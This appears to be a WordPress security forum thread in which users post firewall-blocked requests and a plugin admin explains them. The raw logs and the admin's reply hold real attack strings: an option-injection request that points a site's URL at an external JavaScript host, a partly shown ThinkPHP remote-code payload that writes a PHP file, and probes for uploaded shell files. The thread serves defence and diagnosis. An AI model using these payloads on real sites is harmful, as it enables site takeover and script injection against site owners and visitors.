Topic: Security Log Event Codes | BulletProof Security Forum

Security Log Event Codes

Tagged: Event Codes, Security Log

This topic has 84 replies, 19 voices, and was last updated 1 month ago by Max Parker.

Viewing 10 posts - 76 through 85 (of 85 total)

← 1 2 3 4 5 6

Author

Posts

March 28, 2018 at 11:58 am #35544

Bub

Participant

Done and done…. Thanks. This topic should now be closed.

March 28, 2018 at 12:00 pm #35545

Bub

Participant

Again, thanks.

August 6, 2019 at 2:16 am #37723

sergeykar

Participant

I have been seeing this frequently in my security log – and it appears like a hack attempt – not sure what it is because I have not seen this in the past. It appears BPS is doing it’s job – however is there a weakness this attempt is trying to exploit?

[403 GET Request: 06.08.2019 - 10:15]
BPS: 3.5
WP: 5.2.2
Event Code: WPADMIN-SBR
Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
REMOTE_ADDR: 159.69.154.78
Host Name: static.78.154.69.159.clients.your-server.de
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP:
HTTP_FORWARDED:
HTTP_X_FORWARDED_FOR:
HTTP_X_CLUSTER_CLIENT_IP:
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /wp-admin/admin-ajax.php?nd_options_value_import_settings=siteurl[nd_options_option_value]https://jackielovedogs.com/pret.js?l=1&[nd_options_end_option]
QUERY_STRING: nd_options_value_import_settings=siteurl[nd_options_option_value]https://jackielovedogs.com/pret.js?l=1&[nd_options_end_option]
HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36

August 6, 2019 at 8:25 am #37724

AITpro Admin

Keymaster

This is either a probe looking for existing injected hacker code in your website’s Source Code or a hacker trying to exploit an existing hack injection on your website’s Source Code. To check if your website is hacked do the steps below:

1. Go to your website’s home page.
2. Right mouse click and click View page source (google chrome) or a similar command for other Browsers.
3. Use your Browser’s Find… command (google chrome – located under settings > Find…) and enter this search string: nd_options
4. If you see/find Source Code that looks like this below then your website is hacked.
5. Let me know if your Browser Find/Search finds any search results or not.

httx://expat.ca/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=jfjvc.php&vars%5B1%5D%5B%5D=%3C?php%20mb_ereg_replace(, httx://expat.ca/jfjvc.php, httx://expat.ca/wp-admin/admin-ajax.php?nd_options_value_import_settings=siteurl[nd_options_option_value]httxs://jackielovedogs.com/pret.js?l=1&[nd_options_end_option], httx://expat.ca/wp-admin/admin-post.phpnd_options_value_import_settings=home[nd_options_option_value]httxs://jackielovedogs.com/pret?l=1&[nd_options_end_option],

September 20, 2020 at 2:35 am #39337

Chris Moon

Participant

Found this in my Security Log and not sure what it mens:

[403 GET Request: September 19, 2020 - 23:57]
BPS Pro: 14.8
WP: 5.5.1
Event Code: PFWR-PSBR-HPRA
Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
REMOTE_ADDR: GDPR Compliance On
Host Name: ns4.transcomag.net
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP: GDPR Compliance On
HTTP_FORWARDED: GDPR Compliance On
HTTP_X_FORWARDED_FOR: GDPR Compliance On
HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/n.php
QUERY_STRING:
HTTP_USER_AGENT: Mozilla

[403 GET Request: September 19, 2020 - 23:57]
BPS Pro: 14.8
WP: 5.5.1
Event Code: PFWR-PSBR-HPRA
Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
REMOTE_ADDR: GDPR Compliance On
Host Name: ns4.transcomag.net
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP: GDPR Compliance On
HTTP_FORWARDED: GDPR Compliance On
HTTP_X_FORWARDED_FOR: GDPR Compliance On
HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/accesson.php
QUERY_STRING:
HTTP_USER_AGENT: Mozilla

[403 GET Request: September 19, 2020 - 23:57]
BPS Pro: 14.8
WP: 5.5.1
Event Code: PFWR-PSBR-HPRA
Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
REMOTE_ADDR: GDPR Compliance On
Host Name: ns4.transcomag.net
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP: GDPR Compliance On
HTTP_FORWARDED: GDPR Compliance On
HTTP_X_FORWARDED_FOR: GDPR Compliance On
HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/upload.php
QUERY_STRING:
HTTP_USER_AGENT: Mozilla

[403 GET Request: September 19, 2020 - 23:57]
BPS Pro: 14.8
WP: 5.5.1
Event Code: PFWR-PSBR-HPRA
Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
REMOTE_ADDR: GDPR Compliance On
Host Name: ns4.transcomag.net
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP: GDPR Compliance On
HTTP_FORWARDED: GDPR Compliance On
HTTP_X_FORWARDED_FOR: GDPR Compliance On
HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/thumbs.php
QUERY_STRING:
HTTP_USER_AGENT: Mozilla

[403 GET Request: September 19, 2020 - 23:57]
BPS Pro: 14.8
WP: 5.5.1
Event Code: PFWR-PSBR-HPRA
Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
REMOTE_ADDR: GDPR Compliance On
Host Name: ns4.transcomag.net
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP: GDPR Compliance On
HTTP_FORWARDED: GDPR Compliance On
HTTP_X_FORWARDED_FOR: GDPR Compliance On
HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/x.php
QUERY_STRING:
HTTP_USER_AGENT: Mozilla

[403 GET Request: September 19, 2020 - 23:57]
BPS Pro: 14.8
WP: 5.5.1
Event Code: PFWR-PSBR-HPRA
Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
REMOTE_ADDR: GDPR Compliance On
Host Name: ns4.transcomag.net
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP: GDPR Compliance On
HTTP_FORWARDED: GDPR Compliance On
HTTP_X_FORWARDED_FOR: GDPR Compliance On
HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /wp-content/plugins/quiz-master-next/js/admin.js
QUERY_STRING:
HTTP_USER_AGENT: Mozilla

September 20, 2020 at 6:12 am #39338

AITpro Admin

Keymaster

@ Chris Moon – These are typical hacker recon/searches for known plugins with security vulnerabilities. The BPS Pro Plugin Firewall protects all plugin files in the WordPress /plugins/ folder. So these recons/searches were blocked by the BPS Pro Plugin Firewall.

September 20, 2020 at 10:58 pm #39340

Chris Moon

Participant

Thanks Ed, that’s reassuring.

July 18, 2022 at 3:12 am #42015

bataraha

Participant

Thanks for confirming the solution. Also we are trying several different methods to try and get the exact solution that is needed in Phase 2 Security Log Solution Targeting on the frontend of the site so that it is logged with the exact solution in the Security Log, but we keep running into a website performance problem. A website performance decrease of even .1 (point 1) seconds is not acceptable so it is looking like the backend troubleshooting tool is going to be the only way to go.

July 18, 2022 at 5:30 am #42016

AITpro Admin

Keymaster

@ bataraha – BPS does not cause any website performance slowness and can actually speed up website performance.

September 2, 2022 at 4:04 am #42090

Max Parker

Participant

interesting information

Author

Posts

Viewing 10 posts - 76 through 85 (of 85 total)

← 1 2 3 4 5 6

You must be logged in to reply to this topic.

BulletProof Security Forum

Security Log Event Codes

Search Forums

Topic Tags